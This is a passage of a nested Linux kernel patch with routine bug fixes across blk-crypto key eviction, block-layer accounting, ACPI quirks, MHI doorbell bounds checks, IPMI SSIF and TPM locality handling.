+  */
+ int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
+ 			   const struct blk_crypto_key *key)
+ {
+ 	struct blk_crypto_keyslot *slot;
+-	int err = 0;
++	int err;
+ 
+ 	if (profile->num_slots == 0) {
+ 		if (profile->ll_ops.keyslot_evict) {
+@@ -388,22 +377,30 @@ int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
+ 
+ 	blk_crypto_hw_enter(profile);
+ 	slot = blk_crypto_find_keyslot(profile, key);
+-	if (!slot)
+-		goto out_unlock;
++	if (!slot) {
++		/*
++		 * Not an error, since a key not in use by I/O is not guaranteed
++		 * to be in a keyslot.  There can be more keys than keyslots.
++		 */
++		err = 0;
++		goto out;
++	}
+ 
+ 	if (WARN_ON_ONCE(atomic_read(&slot->slot_refs) != 0)) {
++		/* BUG: key is still in use by I/O */
+ 		err = -EBUSY;
+-		goto out_unlock;
++		goto out_remove;
+ 	}
+ 	err = profile->ll_ops.keyslot_evict(profile, key,
+ 					    blk_crypto_keyslot_index(slot));
+-	if (err)
+-		goto out_unlock;
+-
++out_remove:
++	/*
++	 * Callers free the key even on error, so unlink the key from the hash
++	 * table and clear slot->key even on error.
++	 */
+ 	hlist_del(&slot->hash_node);
+ 	slot->key = NULL;
+-	err = 0;
+-out_unlock:
++out:
+ 	blk_crypto_hw_exit(profile);
+ 	return err;
+ }
+diff --git a/block/blk-crypto.c b/block/blk-crypto.c
+index a496aaef85ba4..6733286d506f6 100644
+--- a/block/blk-crypto.c
++++ b/block/blk-crypto.c
+@@ -13,6 +13,7 @@
+ #include <linux/blkdev.h>
+ #include <linux/blk-crypto-profile.h>
+ #include <linux/module.h>
++#include <linux/ratelimit.h>
+ #include <linux/slab.h>
+ 
+ #include "blk-crypto-internal.h"
+@@ -218,27 +219,27 @@ static bool bio_crypt_check_alignment(struct bio *bio)
+ 	return true;
+ }
+ 
+-blk_status_t __blk_crypto_init_request(struct request *rq)
++blk_status_t __blk_crypto_rq_get_keyslot(struct request *rq)
+ {
+ 	return blk_crypto_get_keyslot(rq->q->crypto_profile,
+ 				      rq->crypt_ctx->bc_key,
+ 				      &rq->crypt_keyslot);
+ }
+ 
+-/**
+- * __blk_crypto_free_request - Uninitialize the crypto fields of a request.
+- *
+- * @rq: The request whose crypto fields to uninitialize.
+- *
+- * Completely uninitializes the crypto fields of a request. If a keyslot has
+- * been programmed into some inline encryption hardware, that keyslot is
+- * released. The rq->crypt_ctx is also freed.
+- */
+-void __blk_crypto_free_request(struct request *rq)
++void __blk_crypto_rq_put_keyslot(struct request *rq)
+ {
+ 	blk_crypto_put_keyslot(rq->crypt_keyslot);
++	rq->crypt_keyslot = NULL;
++}
++
++void __blk_crypto_free_request(struct request *rq)
++{
++	/* The keyslot, if one was needed, should have been released earlier. */
++	if (WARN_ON_ONCE(rq->crypt_keyslot))
++		__blk_crypto_rq_put_keyslot(rq);
++
+ 	mempool_free(rq->crypt_ctx, bio_crypt_ctx_pool);
+-	blk_crypto_rq_set_defaults(rq);
++	rq->crypt_ctx = NULL;
+ }
+ 
+ /**
+@@ -267,7 +268,6 @@ bool __blk_crypto_bio_prep(struct bio **bio_ptr)
+ {
+ 	struct bio *bio = *bio_ptr;
+ 	const struct blk_crypto_key *bc_key = bio->bi_crypt_context->bc_key;
+-	struct blk_crypto_profile *profile;
+ 
+ 	/* Error if bio has no data. */
+ 	if (WARN_ON_ONCE(!bio_has_data(bio))) {
+@@ -284,10 +284,9 @@ bool __blk_crypto_bio_prep(struct bio **bio_ptr)
+ 	 * Success if device supports the encryption context, or if we succeeded
+ 	 * in falling back to the crypto API.
+ 	 */
+-	profile = bdev_get_queue(bio->bi_bdev)->crypto_profile;
+-	if (__blk_crypto_cfg_supported(profile, &bc_key->crypto_cfg))
++	if (blk_crypto_config_supported_natively(bio->bi_bdev,
++						 &bc_key->crypto_cfg))
+ 		return true;
+-
+ 	if (blk_crypto_fallback_bio_prep(bio_ptr))
+ 		return true;
+ fail:
+@@ -352,22 +351,29 @@ int blk_crypto_init_key(struct blk_crypto_key *blk_key, const u8 *raw_key,
+ 	return 0;
+ }
+ 
++bool blk_crypto_config_supported_natively(struct block_device *bdev,
++					  const struct blk_crypto_config *cfg)
++{
++	return __blk_crypto_cfg_supported(bdev_get_queue(bdev)->crypto_profile,
++					  cfg);
++}
++
+ /*
+  * Check if bios with @cfg can be en/decrypted by blk-crypto (i.e. either the
+- * request queue it's submitted to supports inline crypto, or the
++ * block_device it's submitted to supports inline crypto, or the
+  * blk-crypto-fallback is enabled and supports the cfg).
+  */
+-bool blk_crypto_config_supported(struct request_queue *q,
++bool blk_crypto_config_supported(struct block_device *bdev,
+ 				 const struct blk_crypto_config *cfg)
+ {
+ 	return IS_ENABLED(CONFIG_BLK_INLINE_ENCRYPTION_FALLBACK) ||
+-	       __blk_crypto_cfg_supported(q->crypto_profile, cfg);
++	       blk_crypto_config_supported_natively(bdev, cfg);
+ }
+ 
+ /**
+  * blk_crypto_start_using_key() - Start using a blk_crypto_key on a device
++ * @bdev: block device to operate on
+  * @key: A key to use on the device
+- * @q: the request queue for the device
+  *
+  * Upper layers must call this function to ensure that either the hardware
+  * supports the key's crypto settings, or the crypto API fallback has transforms
+@@ -379,37 +385,48 @@ bool blk_crypto_config_supported(struct request_queue *q,
+  *	   blk-crypto-fallback is either disabled or the needed algorithm
+  *	   is disabled in the crypto API; or another -errno code.
+  */
+-int blk_crypto_start_using_key(const struct blk_crypto_key *key,
+-			       struct request_queue *q)
++int blk_crypto_start_using_key(struct block_device *bdev,
++			       const struct blk_crypto_key *key)
+ {
+-	if (__blk_crypto_cfg_supported(q->crypto_profile, &key->crypto_cfg))
++	if (blk_crypto_config_supported_natively(bdev, &key->crypto_cfg))
+ 		return 0;
+ 	return blk_crypto_fallback_start_using_mode(key->crypto_cfg.crypto_mode);
+ }
+ 
+ /**
+- * blk_crypto_evict_key() - Evict a key from any inline encryption hardware
+- *			    it may have been programmed into
+- * @q: The request queue who's associated inline encryption hardware this key
+- *     might have been programmed into
+- * @key: The key to evict
++ * blk_crypto_evict_key() - Evict a blk_crypto_key from a block_device
++ * @bdev: a block_device on which I/O using the key may have been done
++ * @key: the key to evict
++ *
++ * For a given block_device, this function removes the given blk_crypto_key from
++ * the keyslot management structures and evicts it from any underlying hardware
++ * keyslot(s) or blk-crypto-fallback keyslot it may have been programmed into.
+  *
+- * Upper layers (filesystems) must call this function to ensure that a key is
+- * evicted from any hardware that it might have been programmed into.  The key
+- * must not be in use by any in-flight IO when this function is called.
++ * Upper layers must call this before freeing the blk_crypto_key.  It must be
++ * called for every block_device the key may have been used on.  The key must no
++ * longer be in use by any I/O when this function is called.
+  *
+- * Return: 0 on success or if the key wasn't in any keyslot; -errno on error.
++ * Context: May sleep.
+  */
+-int blk_crypto_evict_key(struct request_queue *q,
+-			 const struct blk_crypto_key *key)
++void blk_crypto_evict_key(struct block_device *bdev,
++			  const struct blk_crypto_key *key)
+ {
+-	if (__blk_crypto_cfg_supported(q->crypto_profile, &key->crypto_cfg))
+-		return __blk_crypto_evict_key(q->crypto_profile, key);
++	struct request_queue *q = bdev_get_queue(bdev);
++	int err;
+ 
++	if (blk_crypto_config_supported_natively(bdev, &key->crypto_cfg))
++		err = __blk_crypto_evict_key(q->crypto_profile, key);
++	else
++		err = blk_crypto_fallback_evict_key(key);
+ 	/*
+-	 * If the request_queue didn't support the key, then blk-crypto-fallback
+-	 * may have been used, so try to evict the key from blk-crypto-fallback.
++	 * An error can only occur here if the key failed to be evicted from a
++	 * keyslot (due to a hardware or driver issue) or is allegedly still in
++	 * use by I/O (due to a kernel bug).  Even in these cases, the key is
++	 * still unlinked from the keyslot management structures, and the caller
++	 * is allowed and expected to free it right away.  There's nothing
++	 * callers can do to handle errors, so just log them and return void.
+ 	 */
+-	return blk_crypto_fallback_evict_key(key);
++	if (err)
++		pr_warn_ratelimited("%pg: error %d evicting key\n", bdev, err);
+ }
+ EXPORT_SYMBOL_GPL(blk_crypto_evict_key);
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index bfc33fa9a063c..00d59d2288f00 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -232,7 +232,9 @@ enum {
+ 
+ 	/* 1/64k is granular enough and can easily be handled w/ u32 */
+ 	WEIGHT_ONE		= 1 << 16,
++};
+ 
++enum {
+ 	/*
+ 	 * As vtime is used to calculate the cost of each IO, it needs to
+ 	 * be fairly high precision.  For example, it should be able to
+@@ -256,6 +258,11 @@ enum {
+ 	VRATE_MIN		= VTIME_PER_USEC * VRATE_MIN_PPM / MILLION,
+ 	VRATE_CLAMP_ADJ_PCT	= 4,
+ 
++	/* switch iff the conditions are met for longer than this */
++	AUTOP_CYCLE_NSEC	= 10LLU * NSEC_PER_SEC,
++};
++
++enum {
+ 	/* if IOs end up waiting for requests, issue less */
+ 	RQ_WAIT_BUSY_PCT	= 5,
+ 
+@@ -294,9 +301,6 @@ enum {
+ 	/* don't let cmds which take a very long time pin lagging for too long */
+ 	MAX_LAGGING_PERIODS	= 10,
+ 
+-	/* switch iff the conditions are met for longer than this */
+-	AUTOP_CYCLE_NSEC	= 10LLU * NSEC_PER_SEC,
+-
+ 	/*
+ 	 * Count IO size in 4k pages.  The 12bit shift helps keeping
+ 	 * size-proportional components of cost calculation in closer
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index 17ac532105a97..cc7f6a4a255c9 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -863,6 +863,8 @@ static struct request *attempt_merge(struct request_queue *q,
+ 	if (!blk_discard_mergable(req))
+ 		elv_merge_requests(q, req, next);
+ 
++	blk_crypto_rq_put_keyslot(next);
++
+ 	/*
+ 	 * 'next' is going away, so update stats accordingly
+ 	 */
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 1b04a1c48ee50..1ab41fbca0946 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -808,6 +808,12 @@ static void blk_complete_request(struct request *req)
+ 		req->q->integrity.profile->complete_fn(req, total_bytes);
+ #endif
+ 
++	/*
++	 * Upper layers may call blk_crypto_evict_key() anytime after the last
++	 * bio_endio().  Therefore, the keyslot must be released before that.
++	 */
++	blk_crypto_rq_put_keyslot(req);
++
+ 	blk_account_io_completion(req, total_bytes);
+ 
+ 	do {
+@@ -873,6 +879,13 @@ bool blk_update_request(struct request *req, blk_status_t error,
+ 		req->q->integrity.profile->complete_fn(req, nr_bytes);
+ #endif
+ 
++	/*
++	 * Upper layers may call blk_crypto_evict_key() anytime after the last
++	 * bio_endio().  Therefore, the keyslot must be released before that.
++	 */
++	if (blk_crypto_rq_has_keyslot(req) && nr_bytes >= blk_rq_bytes(req))
++		__blk_crypto_rq_put_keyslot(req);
++
+ 	if (unlikely(error && !blk_rq_is_passthrough(req) &&
+ 		     !(req->rq_flags & RQF_QUIET)) &&
+ 		     !test_bit(GD_DEAD, &req->q->disk->state)) {
+@@ -1300,7 +1313,7 @@ void blk_execute_rq_nowait(struct request *rq, bool at_head)
+ 	 * device, directly accessing the plug instead of using blk_mq_plug()
+ 	 * should not have any consequences.
+ 	 */
+-	if (current->plug)
++	if (current->plug && !at_head)
+ 		blk_add_rq_to_plug(current->plug, rq);
+ 	else
+ 		blk_mq_sched_insert_request(rq, at_head, true, false);
+@@ -2955,7 +2968,7 @@ void blk_mq_submit_bio(struct bio *bio)
+ 
+ 	blk_mq_bio_to_request(rq, bio, nr_segs);
+ 
+-	ret = blk_crypto_init_request(rq);
++	ret = blk_crypto_rq_get_keyslot(rq);
+ 	if (ret != BLK_STS_OK) {
+ 		bio->bi_status = ret;
+ 		bio_endio(bio);
+diff --git a/block/blk-stat.c b/block/blk-stat.c
+index 2ea01b5c1aca0..da9407b7d4abf 100644
+--- a/block/blk-stat.c
++++ b/block/blk-stat.c
+@@ -189,7 +189,7 @@ void blk_stat_disable_accounting(struct request_queue *q)
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&q->stats->lock, flags);
+-	if (!--q->stats->accounting)
++	if (!--q->stats->accounting && list_empty(&q->stats->callbacks))
+ 		blk_queue_flag_clear(QUEUE_FLAG_STATS, q);
+ 	spin_unlock_irqrestore(&q->stats->lock, flags);
+ }
+@@ -200,7 +200,7 @@ void blk_stat_enable_accounting(struct request_queue *q)
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&q->stats->lock, flags);
+-	if (!q->stats->accounting++)
++	if (!q->stats->accounting++ && list_empty(&q->stats->callbacks))
+ 		blk_queue_flag_set(QUEUE_FLAG_STATS, q);
+ 	spin_unlock_irqrestore(&q->stats->lock, flags);
+ }
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index 5c69ff8e8fa5c..c72622f20f52b 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -472,7 +472,9 @@ void crypto_unregister_alg(struct crypto_alg *alg)
+ 	if (WARN(ret, "Algorithm %s is not registered", alg->cra_driver_name))
+ 		return;
+ 
+-	BUG_ON(refcount_read(&alg->cra_refcnt) != 1);
++	if (WARN_ON(refcount_read(&alg->cra_refcnt) != 1))
++		return;
++
+ 	if (alg->cra_destroy)
+ 		alg->cra_destroy(alg);
+ 
+diff --git a/crypto/drbg.c b/crypto/drbg.c
+index 982d4ca4526d8..ff4ebbc68efab 100644
+--- a/crypto/drbg.c
++++ b/crypto/drbg.c
+@@ -1546,7 +1546,7 @@ static int drbg_prepare_hrng(struct drbg_state *drbg)
+ 		const int err = PTR_ERR(drbg->jent);
+ 
+ 		drbg->jent = NULL;
+-		if (fips_enabled || err != -ENOENT)
++		if (fips_enabled)
+ 			return err;
+ 		pr_info("DRBG: Continuing without Jitter RNG\n");
+ 	}
+diff --git a/drivers/acpi/bus.c b/drivers/acpi/bus.c
+index 3b6146b1e25cc..a16b7de73d164 100644
+--- a/drivers/acpi/bus.c
++++ b/drivers/acpi/bus.c
+@@ -586,6 +586,7 @@ static void acpi_device_remove_notify_handler(struct acpi_device *device,
+ 		acpi_remove_notify_handler(device->handle, type,
+ 					   acpi_notify_device);
+ 	}
++	acpi_os_wait_events_complete();
+ }
+ 
+ /* Handle events targeting \_SB device (at present only graceful shutdown) */
+diff --git a/drivers/acpi/power.c b/drivers/acpi/power.c
+index f2588aba8421e..aea8c994caeac 100644
+--- a/drivers/acpi/power.c
++++ b/drivers/acpi/power.c
+@@ -23,6 +23,7 @@
+ 
+ #define pr_fmt(fmt) "ACPI: PM: " fmt
+ 
++#include <linux/dmi.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/init.h>
+@@ -1022,6 +1023,21 @@ void acpi_resume_power_resources(void)
+ }
+ #endif
+ 
++static const struct dmi_system_id dmi_leave_unused_power_resources_on[] = {
++	{
++		/*
++		 * The Toshiba Click Mini has a CPR3 power-resource which must
++		 * be on for the touchscreen to work, but which is not in any
++		 * _PR? lists. The other 2 affected power-resources are no-ops.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "SATELLITE Click Mini L9W-B"),
++		},
++	},
++	{}
++};
++
+ /**
+  * acpi_turn_off_unused_power_resources - Turn off power resources not in use.
+  */
+@@ -1029,6 +1045,9 @@ void acpi_turn_off_unused_power_resources(void)
+ {
+ 	struct acpi_power_resource *resource;
+ 
++	if (dmi_check_system(dmi_leave_unused_power_resources_on))
++		return;
++
+ 	mutex_lock(&power_resource_list_lock);
+ 
+ 	list_for_each_entry_reverse(resource, &acpi_power_resource_list, list_node) {
+diff --git a/drivers/acpi/processor_pdc.c b/drivers/acpi/processor_pdc.c
+index 8c3f82c9fff35..18fb04523f93b 100644
+--- a/drivers/acpi/processor_pdc.c
++++ b/drivers/acpi/processor_pdc.c
+@@ -14,6 +14,8 @@
+ #include <linux/acpi.h>
+ #include <acpi/processor.h>
+ 
++#include <xen/xen.h>
++
+ #include "internal.h"
+ 
+ static bool __init processor_physically_present(acpi_handle handle)
+@@ -47,6 +49,15 @@ static bool __init processor_physically_present(acpi_handle handle)
+ 		return false;
+ 	}
+ 
++	if (xen_initial_domain())
++		/*
++		 * When running as a Xen dom0 the number of processors Linux
++		 * sees can be different from the real number of processors on
++		 * the system, and we still need to execute _PDC for all of
++		 * them.
++		 */
++		return xen_processor_present(acpi_id);
++
+ 	type = (acpi_type == ACPI_TYPE_DEVICE) ? 1 : 0;
+ 	cpuid = acpi_get_cpuid(handle, type, acpi_id);
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index f0f41959faea6..0556c4720d3fa 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -297,20 +297,6 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		},
+ 	},
+ 
+-	/*
+-	 * Older models with nvidia GPU which need acpi_video backlight
+-	 * control and where the old nvidia binary driver series does not
+-	 * call acpi_video_register_backlight().
+-	 */
+-	{
+-	 .callback = video_detect_force_video,
+-	 /* ThinkPad W530 */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
+-		DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad W530"),
+-		},
+-	},
+-
+ 	/*
+ 	 * These models have a working acpi_video backlight control, and using
+ 	 * native backlight causes a regression where backlight does not work
+diff --git a/drivers/acpi/viot.c b/drivers/acpi/viot.c
+index ed752cbbe6362..c8025921c129b 100644
+--- a/drivers/acpi/viot.c
++++ b/drivers/acpi/viot.c
+@@ -328,6 +328,7 @@ static int viot_pci_dev_iommu_init(struct pci_dev *pdev, u16 dev_id, void *data)
+ {
+ 	u32 epid;
+ 	struct viot_endpoint *ep;
++	struct device *aliased_dev = data;
+ 	u32 domain_nr = pci_domain_nr(pdev->bus);
+ 
+ 	list_for_each_entry(ep, &viot_pci_ranges, list) {
+@@ -338,7 +339,7 @@ static int viot_pci_dev_iommu_init(struct pci_dev *pdev, u16 dev_id, void *data)
+ 			epid = ((domain_nr - ep->segment_start) << 16) +
+ 				dev_id - ep->bdf_start + ep->endpoint_id;
+ 
+-			return viot_dev_iommu_init(&pdev->dev, ep->viommu,
++			return viot_dev_iommu_init(aliased_dev, ep->viommu,
+ 						   epid);
+ 		}
+ 	}
+@@ -372,7 +373,7 @@ int viot_iommu_configure(struct device *dev)
+ {
+ 	if (dev_is_pci(dev))
+ 		return pci_for_each_dma_alias(to_pci_dev(dev),
+-					      viot_pci_dev_iommu_init, NULL);
++					      viot_pci_dev_iommu_init, dev);
+ 	else if (dev_is_platform(dev))
+ 		return viot_mmio_dev_iommu_init(to_platform_device(dev));
+ 	return -ENODEV;
+diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c
+index f30256a524be6..c440d1af197a4 100644
+--- a/drivers/base/cacheinfo.c
++++ b/drivers/base/cacheinfo.c
+@@ -38,11 +38,10 @@ static inline bool cache_leaves_are_shared(struct cacheinfo *this_leaf,
+ {
+ 	/*
+ 	 * For non DT/ACPI systems, assume unique level 1 caches,
+-	 * system-wide shared caches for all other levels. This will be used
+-	 * only if arch specific code has not populated shared_cpu_map
++	 * system-wide shared caches for all other levels.
+ 	 */
+ 	if (!(IS_ENABLED(CONFIG_OF) || IS_ENABLED(CONFIG_ACPI)))
+-		return !(this_leaf->level == 1);
++		return (this_leaf->level != 1) && (sib_leaf->level != 1);
+ 
+ 	if ((sib_leaf->attributes & CACHE_ID) &&
+ 	    (this_leaf->attributes & CACHE_ID))
+diff --git a/drivers/base/cpu.c b/drivers/base/cpu.c
+index 4c98849577d4e..7af8e33735a36 100644
+--- a/drivers/base/cpu.c
++++ b/drivers/base/cpu.c
+@@ -487,7 +487,8 @@ static const struct attribute_group *cpu_root_attr_groups[] = {
+ bool cpu_is_hotpluggable(unsigned int cpu)
+ {
+ 	struct device *dev = get_cpu_device(cpu);
+-	return dev && container_of(dev, struct cpu, dev)->hotpluggable;
++	return dev && container_of(dev, struct cpu, dev)->hotpluggable
++		&& tick_nohz_cpu_hotpluggable(cpu);
+ }
+ EXPORT_SYMBOL_GPL(cpu_is_hotpluggable);
+ 
+diff --git a/drivers/block/drbd/drbd_receiver.c b/drivers/block/drbd/drbd_receiver.c
+index 54010eac6ca91..4ba09abbcaf6f 100644
+--- a/drivers/block/drbd/drbd_receiver.c
++++ b/drivers/block/drbd/drbd_receiver.c
+@@ -1280,7 +1280,7 @@ static void one_flush_endio(struct bio *bio)
+ static void submit_one_flush(struct drbd_device *device, struct issue_flush_context *ctx)
+ {
+ 	struct bio *bio = bio_alloc(device->ldev->backing_bdev, 0,
+-				    REQ_OP_FLUSH | REQ_PREFLUSH, GFP_NOIO);
++				    REQ_OP_WRITE | REQ_PREFLUSH, GFP_NOIO);
+ 	struct one_flush_context *octx = kmalloc(sizeof(*octx), GFP_NOIO);
+ 
+ 	if (!octx) {
+diff --git a/drivers/bluetooth/btsdio.c b/drivers/bluetooth/btsdio.c
+index 02893600db390..795be33f2892d 100644
+--- a/drivers/bluetooth/btsdio.c
++++ b/drivers/bluetooth/btsdio.c
+@@ -354,7 +354,6 @@ static void btsdio_remove(struct sdio_func *func)
+ 
+ 	BT_DBG("func %p", func);
+ 
+-	cancel_work_sync(&data->work);
+ 	if (!data)
+ 		return;
+ 
+diff --git a/drivers/bus/mhi/host/boot.c b/drivers/bus/mhi/host/boot.c
+index 26d0eddb14771..55e909f8cb253 100644
+--- a/drivers/bus/mhi/host/boot.c
++++ b/drivers/bus/mhi/host/boot.c
+@@ -393,6 +393,7 @@ void mhi_fw_load_handler(struct mhi_controller *mhi_cntrl)
+ {
+ 	const struct firmware *firmware = NULL;
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
++	enum mhi_pm_state new_state;
+ 	const char *fw_name;
+ 	void *buf;
+ 	dma_addr_t dma_addr;
+@@ -510,14 +511,18 @@ error_ready_state:
+ 	}
+ 
+ error_fw_load:
+-	mhi_cntrl->pm_state = MHI_PM_FW_DL_ERR;
+-	wake_up_all(&mhi_cntrl->state_event);
++	write_lock_irq(&mhi_cntrl->pm_lock);
++	new_state = mhi_tryset_pm_state(mhi_cntrl, MHI_PM_FW_DL_ERR);
++	write_unlock_irq(&mhi_cntrl->pm_lock);
++	if (new_state == MHI_PM_FW_DL_ERR)
++		wake_up_all(&mhi_cntrl->state_event);
+ }
+ 
+ int mhi_download_amss_image(struct mhi_controller *mhi_cntrl)
+ {
+ 	struct image_info *image_info = mhi_cntrl->fbc_image;
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
++	enum mhi_pm_state new_state;
+ 	int ret;
+ 
+ 	if (!image_info)
+@@ -528,8 +533,11 @@ int mhi_download_amss_image(struct mhi_controller *mhi_cntrl)
+ 			       &image_info->mhi_buf[image_info->entries - 1]);
+ 	if (ret) {
+ 		dev_err(dev, "MHI did not load AMSS, ret:%d\n", ret);
+-		mhi_cntrl->pm_state = MHI_PM_FW_DL_ERR;
+-		wake_up_all(&mhi_cntrl->state_event);
++		write_lock_irq(&mhi_cntrl->pm_lock);
++		new_state = mhi_tryset_pm_state(mhi_cntrl, MHI_PM_FW_DL_ERR);
++		write_unlock_irq(&mhi_cntrl->pm_lock);
++		if (new_state == MHI_PM_FW_DL_ERR)
++			wake_up_all(&mhi_cntrl->state_event);
+ 	}
+ 
+ 	return ret;
+diff --git a/drivers/bus/mhi/host/init.c b/drivers/bus/mhi/host/init.c
+index bf672de351315..04fbccff65ac2 100644
+--- a/drivers/bus/mhi/host/init.c
++++ b/drivers/bus/mhi/host/init.c
+@@ -516,6 +516,12 @@ int mhi_init_mmio(struct mhi_controller *mhi_cntrl)
+ 		return -EIO;
+ 	}
+ 
++	if (val >= mhi_cntrl->reg_len - (8 * MHI_DEV_WAKE_DB)) {
++		dev_err(dev, "CHDB offset: 0x%x is out of range: 0x%zx\n",
++			val, mhi_cntrl->reg_len - (8 * MHI_DEV_WAKE_DB));
++		return -ERANGE;
++	}
++
+ 	/* Setup wake db */
+ 	mhi_cntrl->wake_db = base + val + (8 * MHI_DEV_WAKE_DB);
+ 	mhi_cntrl->wake_set = false;
+@@ -532,6 +538,12 @@ int mhi_init_mmio(struct mhi_controller *mhi_cntrl)
+ 		return -EIO;
+ 	}
+ 
++	if (val >= mhi_cntrl->reg_len - (8 * mhi_cntrl->total_ev_rings)) {
++		dev_err(dev, "ERDB offset: 0x%x is out of range: 0x%zx\n",
++			val, mhi_cntrl->reg_len - (8 * mhi_cntrl->total_ev_rings));
++		return -ERANGE;
++	}
++
+ 	/* Setup event db address for each ev_ring */
+ 	mhi_event = mhi_cntrl->mhi_event;
+ 	for (i = 0; i < mhi_cntrl->total_ev_rings; i++, val += 8, mhi_event++) {
+diff --git a/drivers/bus/mhi/host/main.c b/drivers/bus/mhi/host/main.c
+index df0fbfee7b78b..0c3a009ed9bb0 100644
+--- a/drivers/bus/mhi/host/main.c
++++ b/drivers/bus/mhi/host/main.c
+@@ -503,7 +503,7 @@ irqreturn_t mhi_intvec_threaded_handler(int irq_number, void *priv)
+ 	}
+ 	write_unlock_irq(&mhi_cntrl->pm_lock);
+ 
+-	if (pm_state != MHI_PM_SYS_ERR_DETECT || ee == mhi_cntrl->ee)
++	if (pm_state != MHI_PM_SYS_ERR_DETECT)
+ 		goto exit_intvec;
+ 
+ 	switch (ee) {
+diff --git a/drivers/char/ipmi/Kconfig b/drivers/char/ipmi/Kconfig
+index 39565cf74b2c9..df45e0af92382 100644
+--- a/drivers/char/ipmi/Kconfig
++++ b/drivers/char/ipmi/Kconfig
+@@ -162,7 +162,8 @@ config IPMI_KCS_BMC_SERIO
+ 
+ config ASPEED_BT_IPMI_BMC
+ 	depends on ARCH_ASPEED || COMPILE_TEST
+-	depends on REGMAP && REGMAP_MMIO && MFD_SYSCON
++	depends on MFD_SYSCON
++	select REGMAP_MMIO
+ 	tristate "BT IPMI bmc driver"
+ 	help
+ 	  Provides a driver for the BT (Block Transfer) IPMI interface
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index a5ddebb1edea4..d48061ec27dd9 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -557,8 +557,10 @@ static void retry_timeout(struct timer_list *t)
+ 
+ 	if (waiting)
+ 		start_get(ssif_info);
+-	if (resend)
++	if (resend) {
+ 		start_resend(ssif_info);
++		ssif_inc_stat(ssif_info, send_retries);
++	}
+ }
+ 
+ static void watch_timeout(struct timer_list *t)
+@@ -784,9 +786,9 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 		} else if (data[0] != (IPMI_NETFN_APP_REQUEST | 1) << 2
+ 			   || data[1] != IPMI_GET_MSG_FLAGS_CMD) {
+ 			/*
+-			 * Don't abort here, maybe it was a queued
+-			 * response to a previous command.
++			 * Recv error response, give up.
+ 			 */
++			ssif_info->ssif_state = SSIF_IDLE;
+ 			ipmi_ssif_unlock_cond(ssif_info, flags);
+ 			dev_warn(&ssif_info->client->dev,
+ 				 "Invalid response getting flags: %x %x\n",
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index 409682d063098..5165f6d3da228 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -678,7 +678,8 @@ EXPORT_SYMBOL_GPL(tpm_chip_register);
+ void tpm_chip_unregister(struct tpm_chip *chip)
+ {
+ 	tpm_del_legacy_sysfs(chip);
+-	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip))
++	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip) &&
++	    !tpm_amd_is_rng_defective(chip))
+ 		hwrng_unregister(&chip->hwrng);
+ 	tpm_bios_log_teardown(chip);
+ 	if (chip->flags & TPM_CHIP_FLAG_TPM2 && !tpm_is_firmware_upgrade(chip))
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index 3f98e587b3e84..eecfbd7e97867 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -136,16 +136,27 @@ static bool check_locality(struct tpm_chip *chip, int l)
+ 	return false;
+ }
+ 
+-static int release_locality(struct tpm_chip *chip, int l)
++static int __tpm_tis_relinquish_locality(struct tpm_tis_data *priv, int l)
++{
++	tpm_tis_write8(priv, TPM_ACCESS(l), TPM_ACCESS_ACTIVE_LOCALITY);
++
++	return 0;
++}
++
++static int tpm_tis_relinquish_locality(struct tpm_chip *chip, int l)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 
+-	tpm_tis_write8(priv, TPM_ACCESS(l), TPM_ACCESS_ACTIVE_LOCALITY);
++	mutex_lock(&priv->locality_count_mutex);
++	priv->locality_count--;
++	if (priv->locality_count == 0)
++		__tpm_tis_relinquish_locality(priv, l);
++	mutex_unlock(&priv->locality_count_mutex);
+ 
+ 	return 0;
+ }
+ 
+-static int request_locality(struct tpm_chip *chip, int l)
++static int __tpm_tis_request_locality(struct tpm_chip *chip, int l)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 	unsigned long stop, timeout;
+@@ -186,6 +197,20 @@ again:
+ 	return -1;
+ }
+ 
++static int tpm_tis_request_locality(struct tpm_chip *chip, int l)
++{
++	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
++	int ret = 0;
++
++	mutex_lock(&priv->locality_count_mutex);
++	if (priv->locality_count == 0)
++		ret = __tpm_tis_request_locality(chip, l);
++	if (!ret)
